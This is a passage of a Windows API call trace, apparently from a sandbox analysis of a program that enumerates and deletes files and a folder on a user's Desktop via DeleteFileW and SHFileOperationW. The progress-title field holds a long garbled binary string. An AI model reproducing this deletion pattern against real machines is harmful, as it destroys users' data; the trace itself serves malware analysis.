dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="RJ4fo8BlUIkNkFgvJDB3.wav", cAlternateFileName="RJ4FO8~1.WAV")) returned 1 [0090.926] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\RJ4fo8BlUIkNkFgvJDB3.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\ed 0nxq vikuvyr6\\rj4fo8bluiknkfgvjdb3.wav")) returned 1 [0090.928] FindNextFileW (in: hFindFile=0x9a4140, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x258271f7, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x258271f7, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="uqU-SQkb", cAlternateFileName="")) returned 1 [0090.928] FindNextFileW (in: hFindFile=0x9a4140, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x258271f7, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x258271f7, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="uqU-SQkb", cAlternateFileName="")) returned 0 [0090.928] FindClose (in: hFindFile=0x9a4140 | out: hFindFile=0x9a4140) returned 1 [0090.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75858 | out: hHeap=0x2af0000) returned 1 [0090.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0090.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0090.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0090.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0090.928] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0090.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0090.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0090.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0090.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0090.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0090.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0090.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0090.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0090.929] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0090.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0090.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0090.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9328 [0090.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0090.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0090.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9058 [0090.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0090.929] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0090.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0090.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa61b0 [0090.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0090.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0090.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0090.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0090.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0090.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0090.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0090.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0090.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0090.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0090.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0090.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0090.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0090.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75e70 [0090.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa61b0 | out: hHeap=0x2af0000) returned 1 [0090.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0090.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0090.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0090.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0090.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0090.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0090.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0090.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0090.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0090.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0090.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0090.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0090.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0090.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0090.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0090.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x52) returned 0x2a5f6c0 [0090.930] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/ED 0nXQ VIkUvYr6", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6", lpFilePart=0x8cf650*="ED 0nXQ VIkUvYr6") returned 0x28 [0090.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f6c0 | out: hHeap=0x2af0000) returned 1 [0090.930] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6" (normalized: "c:\\users\\fd1hvy\\desktop\\ed 0nxq vikuvyr6")) returned 0x10 [0090.931] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0099.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75e70 | out: hHeap=0x2af0000) returned 1 [0099.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0099.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0099.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0099.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0099.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0099.643] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0099.689] TranslateMessage (lpMsg=0x8cf968) returned 0 [0099.689] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0099.692] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0099.692] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0099.693] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0099.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0099.694] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0099.694] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0099.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0099.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0099.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0099.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0099.696] RtlAllocateHeap 